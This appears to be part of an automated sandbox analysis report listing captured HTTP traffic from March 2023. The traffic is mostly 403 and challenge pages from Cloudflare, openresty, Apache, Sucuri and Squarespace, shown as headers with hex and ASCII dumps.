{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RphpiV8KYy1LJwjjMKAJjsmkjY53EpuGwdJUG%2BrXeet8shoUiMGaWlQJKGfCw4QjkCf%2BCPFfo9FGf%2BQnYkeL0OfRFxp0SI1OeYd10Zn2qvWpjkUqqyp7buuGmUruBg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc85a9bc43618-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 36 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: 1a6f<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: e0752945-f4e7-495e-bc96-4cd1e51d985dCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ynWTKR7WFwR%2BQhqv%2Bbs5LD25vYMv4%2BbRHhBIJLGdIGTnWjwOf9b%2BHSdNlYTKibxom8gVG%2FqMnuv0axRhIbkizih4%2F9XaMs27gaOK3yL7NlnbCqdUdeSeXL5lLguL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=222.000122Server: cloudflareCF-RAY: 7abbc85da94e9a09-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 22 Mar 2023 04:45:00 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:03 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: ZVUFQYCo/qChy9zo3Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E8QL6xXUEkTFOiLe7KQhNvZY0Dj%2FCkyjy2zNZvhXf1biax%2BORMx9QefkQJcdifEfgAgSyV%2FFEU8zqUYmVPoXtajKxb6oLImsn7nyFk2Z4Gniso%2Fl0c9Crqn%2BcQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc87038262c16-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 64 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: 1d5d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:45:03 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:03 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: 5sExE897/xJGivqdKData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:03 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 